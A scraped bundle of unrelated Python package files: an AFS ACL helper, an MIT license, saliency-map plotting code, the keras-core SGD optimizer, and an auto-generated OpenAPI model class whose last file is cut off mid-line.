for p in pos.items():
acl += "%s\t%d\n" % p
for n in neg.items():
acl += "%s\t%d\n" % n
return acl
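# A hedged illustration of the text layout _parseAcl() consumes and _unparseAcl()
# produces: the first line is the positive-entry count, the second the negative-entry
# count, then one "name<TAB>bitmask" entry per line. The principal names below are
# placeholders and the bitmask values depend on the constants exported by afs._acl.
#
# pos, neg = _parseAcl("2\n0\nsystem:administrators\t127\nsystem:anyuser\t9\n")
# # pos -> {'system:administrators': 127, 'system:anyuser': 9}, neg -> {}
# # _unparseAcl(pos, neg) serializes the two dictionaries back into the same layout.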
class ACL(object):
def __init__(self, pos, neg):
"""
``pos``
Dictionary of usernames to positive ACL bitmasks
``neg``
Dictionary of usernames to negative ACL bitmasks
"""
self.pos = pos
self.neg = neg
@staticmethod
def retrieve(dir, follow=True):
"""Retrieve the ACL for an AFS directory"""
pos, neg = _parseAcl(_acl.getAcl(dir, follow))
return ACL(pos, neg)
def apply(self, dir, follow=True):
"""Apply the ACL to a directory"""
self._clean()
_acl.setAcl(dir, _unparseAcl(self.pos, self.neg), follow)
def _clean(self):
"""Clean an ACL by removing any entries whose bitmask is 0"""
for n,a in self.pos.items():
if a == 0:
del self.pos[n]
for n,a in self.neg.items():
if a == 0:
del self.neg[n]
def set(self, user, bitmask, negative=False):
"""Set the bitmask for a given user"""
if bitmask < 0 or bitmask > max(_char2bit.values()):
raise ValueError, "Invalid bitmask"
if negative:
self.neg[user] = bitmask
else:
self.pos[user] = bitmask
def remove(self, user, negative=False):
"""Convenience function to removeSet the bitmask for a given user"""
self.set(user, 0, negative) | PypiClean |
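# A hedged usage sketch for the module above. PyAFS targets Python 2 (note the
# iteritems/raise syntax), so the sketch uses Python 2 print statements; it also
# assumes the afs._acl extension is built and that the placeholder AFS path exists
# and is writable by the caller.
from afs.acl import ACL, readRights, showRights, rightsToEnglish

mask = readRights("write")         # canonical name -> 'rlidwk' -> bitmask
print showRights(mask)             # 'rlidwk'
print rightsToEnglish("rl")        # 'read'

acl = ACL.retrieve("/afs/example.com/user/someuser")   # placeholder directory
acl.set("system:anyuser", readRights("read"))
acl.apply("/afs/example.com/user/someuser")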
/jupyterlab_remote_contents-0.1.1.tar.gz/jupyterlab_remote_contents-0.1.1/node_modules/encoding-down/LICENSE.md | # The MIT License (MIT)
**Copyright © 2012-present [Contributors](CONTRIBUTORS.md).**
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| PypiClean |
/tootorch-1.9-py3-none-any.whl/tootourch/visualization.py | import h5py
import numpy as np
import json
from saliency.attribution_methods import *
from models import SimpleCNNDeconv
import matplotlib.pyplot as plt
def visualize_saliencys(origin_imgs, results, probs, preds, classes, names, target, row, col, savedir=None, **kwargs):
'''
    Visualize saliency maps produced by different attribution methods
Args:
origin_imgs: original images
results: saliency maps
probs: probability by class
preds: predict class
classes: target class
names: attribution method names
target: target dataset. ['mnist','cifar10']
row : number of class
col : number of saliency maps
'''
# initialize
size = (col*3, row*3) if 'size' not in kwargs.keys() else kwargs['size']
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
labelsize = 10 if 'labelsize' not in kwargs.keys() else kwargs['labelsize']
dpi = 100 if 'dpi' not in kwargs.keys() else kwargs['dpi']
cmap = None if 'cmap' not in kwargs.keys() else kwargs['cmap']
if target=='mnist':
origin_imgs= origin_imgs.squeeze()
for i in range(len(results)):
results[i] = results[i].squeeze()
origin_color = 'gray'
color = 'gray' if cmap == None else cmap
else:
origin_color = None
color = cmap
_, ax = plt.subplots(row, col, figsize=size)
# original images
for i in range(row):
ax[i,0].imshow(origin_imgs[i], origin_color)
ax[i,0].set_ylabel('True: {0:}\nPred: {1:} ({2:.2%})'.format(classes[i], int(preds[i]), probs[i]), size=labelsize)
ax[i,0].set_xticks([])
ax[i,0].set_yticks([])
# set title
if i == 0:
ax[i,0].set_title('Original Image', size=fontsize)
for i in range(row*(col-1)):
r = i//(col-1)
c = i%(col-1)
ax[r,c+1].imshow(results[c][r], color)
ax[r,c+1].axis('off')
# set title
if r == 0:
ax[r,c+1].set_title(names[c], size=fontsize)
plt.subplots_adjust(wspace=-0.5, hspace=0)
plt.tight_layout()
if savedir:
plt.savefig(savedir, dpi=dpi)
def visualize_selectivity(target, methods, steps, sample_pct, save_dir, **kwargs):
'''
Visualize selectivity logs
Args:
target: target dataset. ['mnist','cifar10']
methods: attribution methods
        steps: number of steps
        sample_pct: sampling percentage used in the evaluation result file name
        save_dir: save path and file name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] if 'color' not in kwargs.keys() else kwargs['color']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
# set results dictionary by attribution methods
attr_method_dict = {}
for i in range(len(methods)):
attr_method_dict[methods[i]] = {'data':[]}
# results load
for attr_method in attr_method_dict.keys():
hf = h5py.File(f'../evaluation/{target}_{attr_method}_steps{steps}_ckp5_sample{sample_pct}.hdf5', 'r')
attr_method_dict[attr_method]['data'] = hf
# Accuracy Change by Methods
_, ax = plt.subplots(1,len(methods)+1, figsize=size)
for i in range(len(methods)):
method = methods[i]
# results load
hf = h5py.File(f'../evaluation/{target}_{method}_steps{steps}_ckp5_sample{sample_pct}.hdf5', 'r')
# acc
acc = np.array(hf['acc'])
# plotting
ax[0].plot(range(steps+1), acc, label=method, color=color[i])
ax[0].legend()
# close
hf.close()
# text
ax[0].set_xlabel('# pixel removed', size=fontsize)
ax[0].set_ylabel('Accuracy', size=fontsize)
ax[0].set_title('[{}] Accuracy Change\nby Methods'.format(target.upper()), size=fontsize)
ax[0].set_ylim([0,1])
# Score Change by Methods
for i in range(len(methods)):
method = methods[i]
# results load
hf = h5py.File(f'../evaluation/{target}_{method}_steps{steps}_ckp5_sample{sample_pct}.hdf5', 'r')
# score
score = np.array(hf['score'])
mean_score = np.mean(score, axis=1)
# plotting average score
ax[i+1].plot(range(steps+1), mean_score, label=method, color=color[i], linewidth=4)
# sample index
np.random.seed(random_state)
sample_idx = np.random.choice(score.shape[1], 100, replace=False)
sample_score = score[:,sample_idx]
# plotting
for j in range(100):
ax[i+1].plot(range(steps+1), sample_score[:,j], color=color[i], linewidth=0.1)
# text
ax[i+1].set_xlabel('# pixel removed', size=fontsize)
ax[i+1].set_ylabel('Score for correct class', size=fontsize)
ax[i+1].set_title('[{}] {}\nScore Change'.format(target.upper(), method), size=fontsize)
ax[i+1].set_ylim([0,1])
# close
hf.close()
# figure adjust
plt.subplots_adjust(wspace=-0.5, hspace=0)
plt.tight_layout()
# save
plt.savefig(save_dir,dpi=dpi)
def visualize_ROARnKAR(targets, ratio_lst, eval_method, methods=None, attention=None, savedir=None, **kwargs):
'''
Visualize ROAR or KAR
Args:
        targets: target datasets, e.g. ['mnist','cifar10']
ratio_lst: pixel ratio list
eval_method: ['ROAR','KAR']
methods: attribution methods
attention: attention method
savedir: save path and save name
'''
    if methods is None:
        assert attention is not None, 'If methods is None, attention should not be None'
        methods = attention
    elif attention is None:
        assert methods is not None, 'If attention is None, methods should not be None'
else:
t_methods = methods + attention
methods = t_methods.copy()
# if attention is not None, define methods list
for i in range(len(methods)):
if methods[i] == 'CAM':
methods[i] = 'CAM_CAM'
elif methods[i] == 'CBAM':
methods[i] = 'CBAM_CO'
elif methods[i] == 'RAN':
methods[i] = 'RAN_CO'
elif methods[i] == 'WARN':
methods[i] = 'WARN_CO'
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] if 'color' not in kwargs.keys() else kwargs['color']
marker = ['o','v','^','s','x','*','p','d'] if 'marker' not in kwargs.keys() else kwargs['marker']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
# initialize methods acc by targets [mnist, cifar10]
test_acc = {target: {} for target in targets}
for target in targets:
test_acc[target] = {m: [] for m in methods}
# load test accuracy
def get_test_acc(methods, targets, test_acc):
for m in methods:
for target in targets:
if ('CAM' in m) or ('CBAM' in m):
model_name = '{}_{}_{}'.format('simple_cnn', target,m.split('_')[0])
elif (('RAN' in m) or ('WARN' in m)) & (m != 'RANDOM'):
model_name = '{}_{}'.format(target, m.split('_')[0])
else:
model_name = '{}_{}'.format('simple_cnn', target)
f = open('../logs/{}_logs.txt'.format(model_name),'r')
acc = json.load(f)['test_result']
test_acc[target][m].append(acc)
return test_acc
# load roar/kar accuracy
def get_roar_kar_test_acc(methods, targets, test_acc):
for target in targets:
for m in methods:
if (('RAN' in m) or ('WARN' in m)) & (m != 'RANDOM'):
model_name = '{}_{}'.format(target, m)
else:
model_name = '{}_{}_{}'.format('simple_cnn', target, m)
for ratio in ratio_lst[1:-1]:
f = open('../logs/{0:}_{1:}{2:.1f}_logs.txt'.format(model_name, eval_method, ratio),'r')
test_acc[target][m].append(json.load(f)['test_result'])
return test_acc
# insert 0
def get_0_test_acc(methods, targets, test_acc):
for target in targets:
for m in methods:
test_acc[target][m].append(0)
return test_acc
# ROAR or KAR
if eval_method=='ROAR':
test_acc = get_test_acc(methods, targets, test_acc)
test_acc = get_roar_kar_test_acc(methods, targets, test_acc)
test_acc = get_0_test_acc(methods, targets, test_acc)
elif eval_method=='KAR':
test_acc = get_0_test_acc(methods, targets, test_acc)
test_acc = get_roar_kar_test_acc(methods, targets, test_acc)
test_acc = get_test_acc(methods, targets, test_acc)
# plotting
f, ax = plt.subplots(1,2,figsize=size)
for i in range(len(targets)):
for j in range(len(methods)):
if methods[j] == 'RANDOM':
ax[i].plot(ratio_lst, test_acc[targets[i]][methods[j]], label=methods[j], color='black', linestyle='--', linewidth=3, alpha=0.5)
else:
ax[i].plot(ratio_lst, test_acc[targets[i]][methods[j]], label=methods[j], color=color[j], marker=marker[j])
ax[i].set_title(f'{eval_method} : {targets[i].upper()}', size=fontsize)
ax[i].set_ylabel('Test accuracy', size=fontsize)
ax[i].set_xlabel(f'% of input features replaced', size=fontsize)
ax[i].set_xlim([0,1])
ax[i].set_ylim([0,1])
ax[i].legend(loc='upper right')
if savedir:
plt.tight_layout()
plt.savefig(savedir, dpi=dpi)
def make_saliency_map(dataset, model, methods, attr_method_lst, name_lst, **kwargs):
'''
Make sliency map
Args:
dataset: target dataset. ['mnist','cifar10']
model: model to apply attribution method
methods: attribution methods
        attr_method_lst: list to which attribution method objects are appended
        name_lst: list to which method display names are appended
    Return:
        the extended attr_method_lst and name_lst
'''
if 'CO' in methods:
CO_attr = ConvOutput(model, **kwargs)
attr_method_lst.append(CO_attr)
        name_lst.append('ConvOutput')
if 'VBP' in methods:
VBP_attr = VanillaBackprop(model, **kwargs)
attr_method_lst.append(VBP_attr)
name_lst.append('Vanilla\nBackprop')
if 'IB' in methods:
IB_attr = InputBackprop(model, **kwargs)
attr_method_lst.append(IB_attr)
name_lst.append('Input\nBackprop')
if 'DeconvNet' in methods:
model_deconv = SimpleCNNDeconv(dataset)
deconvnet_attr = DeconvNet(model, model_deconv, **kwargs)
attr_method_lst.append(deconvnet_attr)
name_lst.append('DeconvNet')
if 'IG' in methods:
IG_attr = IntegratedGradients(model, **kwargs)
attr_method_lst.append(IG_attr)
name_lst.append('Integrated\nGradients')
if 'GB' in methods:
GB_attr = GuidedBackprop(model, **kwargs)
attr_method_lst.append(GB_attr)
name_lst.append('Guided\nBackprop')
if 'GC' in methods:
GC_attr = GradCAM(model, **kwargs)
attr_method_lst.append(GC_attr)
name_lst.append('Grad CAM')
if 'GBGC' in methods:
GBGC_attr = GuidedGradCAM(model, **kwargs)
attr_method_lst.append(GBGC_attr)
name_lst.append('Guided\nGrad CAM')
return attr_method_lst, name_lst
def visualize_coherence_models(dataset, images, pre_images, targets, idx2classes, model, methods, model_names, savedir=None, **kwargs):
'''
Visualize coherence map that compare to attribution methods
Args:
dataset: target dataset. ['mnist','cifar10']
images: original images
pre_images: preprocessed images to evaluate
target: targets to predict
idx2classes: index and class dictionary
model: model to apply attribution methods
methods: attribution methods to extract saliency map
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
wspace = 0 if 'wspace' not in kwargs.keys() else kwargs['wspace']
hspace = 0 if 'hspace' not in kwargs.keys() else kwargs['hspace']
params = {}
n = 0
for m in model_names:
for i in range(len(methods)):
if m == 'RAN':
params[n] = {'layer':5}
else:
params[n] = {}
n += 1
# attribution methods
attr_methods = []
name_lst = []
    if isinstance(model, list):
        for i, m in enumerate(model):
            model_params = {'seq_name':'stages'} if model_names[i] == 'RAN' else {}
            start = len(name_lst)
            attr_methods, name_lst = make_saliency_map(dataset, m, methods, attr_methods, name_lst, **model_params)
            for j in range(start, len(name_lst)):
                name_lst[j] = name_lst[j] + f'\n{model_names[i]}'
# initialize results
nb_class = 10
nb_methods = len(attr_methods)
sal_maps_lst = np.zeros((nb_methods, ) + images.shape, dtype=np.float32)
# make saliency maps
for m in range(nb_methods):
sal_maps, _, _ = attr_methods[m].generate_image(pre_images, targets, **params[m])
sal_maps_lst[m] = sal_maps
# plotting
col = nb_methods + 1 # number of attribution methods + original image
_, ax = plt.subplots(nb_class, col, figsize=size)
# original images
color = 'gray' if dataset == 'mnist' else None
for i in range(nb_class):
img = images[i].squeeze() if dataset == 'mnist' else images[i]
ax[i,0].imshow(img, color)
ax[i,0].set_ylabel('{0:}'.format(idx2classes[i]), size=fontsize)
ax[i,0].set_xticks([])
ax[i,0].set_yticks([])
# set title
if i == 0:
ax[i,0].set_title('Original Image', size=fontsize)
for i in range(nb_class*(col-1)):
r = i//(col-1)
c = i%(col-1)
sal_map = sal_maps_lst[c,r].squeeze() if dataset == 'mnist' else sal_maps_lst[c,r]
ax[r,c+1].imshow(sal_map, color)
ax[r,c+1].axis('off')
# set title
if r == 0:
ax[r,c+1].set_title(name_lst[c], size=fontsize)
plt.subplots_adjust(wspace=wspace, hspace=hspace)
if savedir:
plt.tight_layout()
plt.savefig(savedir,dpi=dpi)
def visualize_coherence(dataset, images, pre_images, targets, idx2classes, model, methods, savedir=None, **kwargs):
'''
Visualize coherence map that compare to attribution methods
Args:
dataset: target dataset. ['mnist','cifar10']
images: original images
pre_images: preprocessed images to evaluate
target: targets to predict
idx2classes: index and class dictionary
model: model to apply attribution methods
methods: attribution methods to extract saliency map
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
# attribution methods
attr_methods = []
name_lst = []
attr_methods, name_lst = make_saliency_map(dataset, model, methods, attr_methods, name_lst, **kwargs)
# initialize results
nb_class = 10
nb_methods = len(attr_methods)
sal_maps_lst = np.zeros((nb_methods, ) + images.shape, dtype=np.float32)
# make saliency maps
outputs = model(pre_images)
probs, preds = outputs.detach().max(1)
probs = probs.numpy()
preds = preds.numpy()
for m in range(nb_methods):
sal_maps, _, _ = attr_methods[m].generate_image(pre_images, targets)
sal_maps_lst[m] = sal_maps
# plotting
col = nb_methods + 1 # number of attribution methods + original image
f, ax = plt.subplots(nb_class, col, figsize=size)
# original images
color = 'gray' if dataset == 'mnist' else None
for i in range(nb_class):
img = images[i].squeeze() if dataset == 'mnist' else images[i]
ax[i,0].imshow(img, color)
ax[i,0].set_ylabel('True: {0:}\nPred: {1:} ({2:.2%})'.format(idx2classes[i], int(preds[i]), probs[i]), size=fontsize-5)
ax[i,0].set_xticks([])
ax[i,0].set_yticks([])
# set title
if i == 0:
ax[i,0].set_title('Original Image', size=fontsize)
for i in range(nb_class*(col-1)):
r = i//(col-1)
c = i%(col-1)
sal_map = sal_maps_lst[c,r].squeeze() if dataset == 'mnist' else sal_maps_lst[c,r]
ax[r,c+1].imshow(sal_map, color)
ax[r,c+1].axis('off')
# set title
if r == 0:
ax[r,c+1].set_title(name_lst[c], size=fontsize)
plt.subplots_adjust(wspace=0, hspace=0)
if savedir:
plt.tight_layout()
plt.savefig(savedir,dpi=dpi)
def visualize_trainlogs(train, valid, title, savedir=None, **kwargs):
'''
Visualize training log
Args:
train: training logs
valid: validation logs
title: graph title
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
f, ax = plt.subplots(figsize=size)
ax2 = ax.twinx()
ax.plot(np.arange(len(train['acc'])), train['acc'], label='Train Acc', color='r')
ax.plot(np.arange(len(valid['acc'])), valid['acc'], label='Valid Acc', color='c')
ax2.plot(np.arange(len(train['loss'])), train['loss'], label='Train Loss', color='g')
ax2.plot(np.arange(len(valid['loss'])), valid['loss'], label='Valid Loss', color='b')
plt.title(title, size=fontsize)
ax.legend(loc='upper right', fontsize=fontsize-2)
ax2.legend(loc='lower right', fontsize=fontsize-2)
if savedir:
plt.tight_layout()
plt.savefig(savedir, dpi=dpi)
def visualize_models_log(log_lst, model_names, train_yn, savedir=None, **kwargs):
'''
Visualize logs of models
Args:
log_lst: log list of models
model_names: model names
train_yn: train or validation
savedir: save path and save name
'''
# initialize
fontsize = 10 if 'fontsize' not in kwargs.keys() else kwargs['fontsize']
size = (5,5) if 'size' not in kwargs.keys() else kwargs['size']
color = ['b', 'g', 'r', 'c', 'm', 'y', 'k', 'w'] if 'color' not in kwargs.keys() else kwargs['color']
marker = ['o','v','^','s','x','*','p','d'] if 'marker' not in kwargs.keys() else kwargs['marker']
random_state = 223 if 'random_state' not in kwargs.keys() else kwargs['random_state']
dpi = None if 'dpi' not in kwargs.keys() else kwargs['dpi']
nb_epoch = 30 if 'nb_epoch' not in kwargs.keys() else kwargs['nb_epoch']
metrics = {'acc':'Accuracy', 'loss':'Loss'}
f, ax = plt.subplots(1,2, figsize=size)
for i, (k, v) in enumerate(metrics.items()):
for j in range(len(log_lst)):
m_logs = log_lst[j][train_yn][0][k]
ax[i].plot(np.arange(nb_epoch), m_logs[:nb_epoch], label=model_names[j], color=color[j])
ax[i].set_title('Comparison of mode {}'.format(train_yn), size=fontsize)
ax[i].set_ylabel(v, size=fontsize)
ax[i].set_xlabel('Epochs', size=fontsize)
ax[i].legend()
if savedir:
plt.tight_layout()
plt.savefig(savedir, dpi=dpi) | PypiClean |
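# A hedged usage sketch for visualize_trainlogs() defined above; it assumes the
# module's own imports (saliency, models) resolve, and the accuracy/loss numbers
# are made-up dummy values used only to show the expected log dictionary shape.
train_log = {'acc': [0.62, 0.81, 0.90, 0.93], 'loss': [1.21, 0.58, 0.31, 0.22]}
valid_log = {'acc': [0.58, 0.76, 0.84, 0.86], 'loss': [1.30, 0.70, 0.45, 0.41]}
visualize_trainlogs(train_log, valid_log,
                    title='SimpleCNN training curve',
                    savedir='train_curve.png',   # forwarded to plt.savefig
                    size=(6, 4), fontsize=12, dpi=150)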
/keras-core-0.1.5.tar.gz/keras-core-0.1.5/keras_core/src/optimizers/sgd.py | from keras_core.src import ops
from keras_core.src.api_export import keras_core_export
from keras_core.src.optimizers import optimizer
@keras_core_export("keras_core.optimizers.SGD")
class SGD(optimizer.Optimizer):
"""Gradient descent (with momentum) optimizer.
Update rule for parameter `w` with gradient `g` when `momentum` is 0:
```python
w = w - learning_rate * g
```
Update rule when `momentum` is larger than 0:
```python
velocity = momentum * velocity - learning_rate * g
w = w + velocity
```
When `nesterov=True`, this rule becomes:
```python
velocity = momentum * velocity - learning_rate * g
w = w + momentum * velocity - learning_rate * g
```
Args:
learning_rate: A float, a
`keras_core.optimizers.schedules.LearningRateSchedule` instance, or
a callable that takes no arguments and returns the actual value to
use. The learning rate. Defaults to 0.01.
momentum: float hyperparameter >= 0 that accelerates gradient descent in
the relevant direction and dampens oscillations. Defaults to 0,
i.e., vanilla gradient descent.
nesterov: boolean. Whether to apply Nesterov momentum.
Defaults to `False`.
{{base_optimizer_keyword_args}}
"""
def __init__(
self,
learning_rate=0.01,
momentum=0.0,
nesterov=False,
weight_decay=None,
clipnorm=None,
clipvalue=None,
global_clipnorm=None,
use_ema=False,
ema_momentum=0.99,
ema_overwrite_frequency=None,
name="SGD",
**kwargs,
):
super().__init__(
learning_rate=learning_rate,
name=name,
weight_decay=weight_decay,
clipnorm=clipnorm,
clipvalue=clipvalue,
global_clipnorm=global_clipnorm,
use_ema=use_ema,
ema_momentum=ema_momentum,
ema_overwrite_frequency=ema_overwrite_frequency,
**kwargs,
)
if not isinstance(momentum, float) or momentum < 0 or momentum > 1:
raise ValueError("`momentum` must be a float between [0, 1].")
self.momentum = momentum
self.nesterov = nesterov
def build(self, variables):
"""Initialize optimizer variables.
SGD optimizer has one variable `momentums`, only set if `self.momentum`
is not 0.
Args:
            variables: list of model variables to build SGD variables on.
"""
if self.built:
return
super().build(variables)
self.momentums = []
if self.momentum != 0:
for variable in variables:
self.momentums.append(
self.add_variable_from_reference(
reference_variable=variable, name="momentum"
)
)
def update_step(self, gradient, variable, learning_rate):
"""Update step given gradient and the associated model variable."""
learning_rate = ops.cast(learning_rate, variable.dtype)
gradient = ops.cast(gradient, variable.dtype)
m = None
if self.momentum != 0:
m = self.momentums[self._get_variable_index(variable)]
if m is not None:
momentum = ops.cast(self.momentum, variable.dtype)
m.assign(-gradient * learning_rate + m * momentum)
if self.nesterov:
variable.assign(
variable - gradient * learning_rate + m * momentum
)
else:
variable.assign(variable + m)
else:
variable.assign(variable - gradient * learning_rate)
def get_config(self):
config = super().get_config()
config.update(
{
"momentum": self.momentum,
"nesterov": self.nesterov,
}
)
return config
SGD.__doc__ = SGD.__doc__.replace(
"{{base_optimizer_keyword_args}}", optimizer.base_optimizer_keyword_args
) | PypiClean |
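# A hedged usage sketch (not part of the keras-core source). The numeric lines simply
# replay the update rules from the docstring with plain Python floats; the optimizer
# construction mirrors the documented constructor arguments and export path.
w, velocity, g, lr, mu = 1.0, 0.0, 0.5, 0.01, 0.9
velocity = mu * velocity - lr * g              # velocity update
w_momentum = w + velocity                      # plain momentum step
w_nesterov = w + mu * velocity - lr * g        # Nesterov step

from keras_core.optimizers import SGD
opt = SGD(learning_rate=0.01, momentum=0.9, nesterov=True)
# Typically passed to model.compile(optimizer=opt, ...) in a Keras workflow.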
/flat_api-1.0.0.tar.gz/flat_api-1.0.0/flat_api/model/class_assignment_update_microsoft_graph.py | import re # noqa: F401
import sys # noqa: F401
from flat_api.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
OpenApiModel
)
from flat_api.exceptions import ApiAttributeError
class ClassAssignmentUpdateMicrosoftGraph(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'categories': ([str], none_type,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'categories': 'categories', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""ClassAssignmentUpdateMicrosoftGraph - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
categories ([str], none_type): List of categories this assignment belongs to. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', True)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
for arg in args:
if isinstance(arg, dict):
kwargs.update(arg)
else:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""ClassAssignmentUpdateMicrosoftGraph - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
                composed schema that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
categories ([str], none_type): List of categories this assignment belongs to. [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
for arg in args:
if isinstance(arg, dict):
kwargs.update(arg)
else:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
